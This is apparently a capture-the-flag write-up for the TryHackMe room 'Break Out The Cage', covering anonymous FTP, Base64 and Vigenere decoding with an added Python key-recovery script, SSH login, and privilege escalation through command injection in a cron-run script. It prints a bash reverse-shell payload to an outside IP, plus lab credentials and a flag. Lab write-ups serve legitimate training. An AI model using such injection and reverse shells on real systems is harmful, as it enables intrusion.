TryHackMe — Break Out The Cage | Full Write-Up
Author: infosecwriteups.com (view original), 2026-6-16 06:49:10

Initial Access

Step 1 — Anonymous FTP & Exfiltration

Connecting to FTP without credentials:

ftp 10.48.182.244
# Username: anonymous
# Password: (blank)
ftp> get dad_tasks

The file content:

UWFwdyBFZWtjbCAtIFB2ciBSTUtQLi4uWFpXIFZXVVIuLi4gVFRJIFhFRi4uLiBMQUEgWlJH
UVJPIS...

Classic Base64. Decoding immediately:

cat dad_tasks | base64 -d

Output:

Qapw Eekcl - Pvr RMKP...XZW VWUR... TTI XEF... LAA ZRGQRO!!!!
Sfw. Kajnmb xsi owuowge
Faz. Tml fkfr qgseik ag oqeibx
Eljwx. Xil bqi aiklbywqe
Rsfv. Zwel vvm imel sumebt lqwdsfk
Yejr. Tqenl Vsw svnt "urqsjetpwbn einyjamu" wf.
Iz glww A ykftef.... Qjhsvbouuoexcmvwkwwatfllxughhbbcmydizwlkbsidiuscwl

Still encrypted. The structure looks like a Vigenere cipher.

Step 2 — Vigenere Cipher Decryption

The first line Qapw Eekcl immediately looks like Nicholas Cage — same character count, same word lengths. Using this as a known-plaintext attack on dcode.fr/vigenere-cipher:

  • Method: Knowing a plaintext word
  • Ciphertext fragment: Qapw Eekcl
  • Known plaintext: Nicholas Cage

Key recovered: NAMELESSTWO

Full decrypted text:

Dads Tasks - The RAGE...THE CAGE... THE MAN... THE LEGEND!!!!
One. Revamp the website
Two. Put more quotes in script
Three. Buy bee pesticide
Four. Help him with acting lessons
Five. Teach Dad what "information security" is.
In case I forget....
Mydadisghostrideraintthatcoolnocausehesonfirejokes
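To reproduce the key recovery offline instead of relying on dcode.fr, here is an added Python example (not part of the original write-up) that takes the ciphertext above and the first decrypted line as a known-plaintext crib, derives the repeating 11-letter key from the keystream, and decrypts the whole note. It assumes the crib aligns with the start of the text and that the key advances only on letters, which is how the decryption above behaves.

```python
import string

# Ciphertext as decoded from dad_tasks in the write-up; the key is unknown here.
CIPHERTEXT = """Qapw Eekcl - Pvr RMKP...XZW VWUR... TTI XEF... LAA ZRGQRO!!!!
Sfw. Kajnmb xsi owuowge
Faz. Tml fkfr qgseik ag oqeibx
Eljwx. Xil bqi aiklbywqe
Rsfv. Zwel vvm imel sumebt lqwdsfk
Yejr. Tqenl Vsw svnt "urqsjetpwbn einyjamu" wf.
Iz glww A ykftef.... Qjhsvbouuoexcmvwkwwatfllxughhbbcmydizwlkbsidiuscwl"""

# Crib: the first plaintext line the write-up recovers (assumed aligned to the start).
CRIB = "Dads Tasks - The RAGE...THE CAGE... THE MAN... THE LEGEND!!!!"


def _letters(text):
    """Return only the alphabetic characters; Vigenere leaves everything else alone."""
    return [ch for ch in text if ch.isalpha()]


def recover_key(ciphertext, crib):
    """Known-plaintext attack: keystream = C - P (mod 26), then find its shortest period."""
    p = _letters(crib)
    c = _letters(ciphertext)[: len(p)]
    stream = [(ord(ci.upper()) - ord(pi.upper())) % 26 for ci, pi in zip(c, p)]
    period = len(stream)  # fallback if the crib is too short to show a repeat
    for cand in range(1, len(stream) + 1):
        if all(stream[i] == stream[i + cand] for i in range(len(stream) - cand)):
            period = cand
            break
    return "".join(string.ascii_uppercase[k] for k in stream[:period])


def vigenere_decrypt(ciphertext, key):
    """Decrypt, keeping case and punctuation; the key index advances only on letters."""
    out, i = [], 0
    for ch in ciphertext:
        if ch.isalpha():
            base = ord("A") if ch.isupper() else ord("a")
            shift = ord(key[i % len(key)].upper()) - ord("A")
            out.append(chr((ord(ch) - base - shift) % 26 + base))
            i += 1
        else:
            out.append(ch)
    return "".join(out)


if __name__ == "__main__":
    key = recover_key(CIPHERTEXT, CRIB)
    print("key:", key)
    print(vigenere_decrypt(CIPHERTEXT, key))
```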

The last line is clearly a password. The website mentioned his son Weston set it up — that gives us a username.

Step 3 — SSH as weston

ssh weston@10.48.182.244
# Password: Mydadisghostrideraintthatcoolnocausehesonfirejokes

We’re in.

Privilege Escalation — weston → cage

Enumeration

Running sudo -l:

User weston may run the following commands on national-treasure:
(root) /usr/bin/bees

/usr/bin/bees just runs wall "AHHHHHHH THEEEEE BEEEEESSSS!!" — not directly exploitable.

Checking group memberships:

id
# uid=1001(weston) gid=1001(weston) groups=1001(weston),1000(cage)

Weston is in the cage group. Running LinPEAS reveals a critical finding:

Group cage:
/opt/.dads_scripts/.files/.quotes (-rwxrw----)

The .quotes file is group-writable. Investigating further:

cat /opt/.dads_scripts/spread_the_quotes.py
#!/usr/bin/env python
import os
import random
lines = open("/opt/.dads_scripts/.files/.quotes").read().splitlines()
quote = random.choice(lines)
os.system("wall " + quote)

This script reads a random line from .quotes and passes it directly to os.system("wall " + quote). That's command injection — whatever is in .quotes gets executed as a shell command.


Watching the broadcast messages confirms the script runs every 3 minutes via a cron job under the cage user.

Exploitation — Cron-based Command Injection

Setting up a listener on the attack machine:

nc -lvnp 4445

Replacing the contents of .quotes with a single reverse shell payload so random.choice has no other option:

echo 'x; bash -c "bash -i >& /dev/tcp/192.168.144.75/4445 0>&1"; #' > /opt/.dads_scripts/.files/.quotes

When the cron job fires, os.system executes:

wall x; bash -c "bash -i >& /dev/tcp/192.168.144.75/4445 0>&1"; #

Shell received as cage.

cage@national-treasure:~$

Flag 1

cat ~/Super_Duper_Checklist
5 - Figure out why Weston has this etched into his desk: THM{M37AL_0R_P3N_T35T1NG}

Source: https://infosecwriteups.com/tryhackme-break-out-the-cage-full-write-up-6de0702d0e01?source=rss----7b722bfd1b8d---4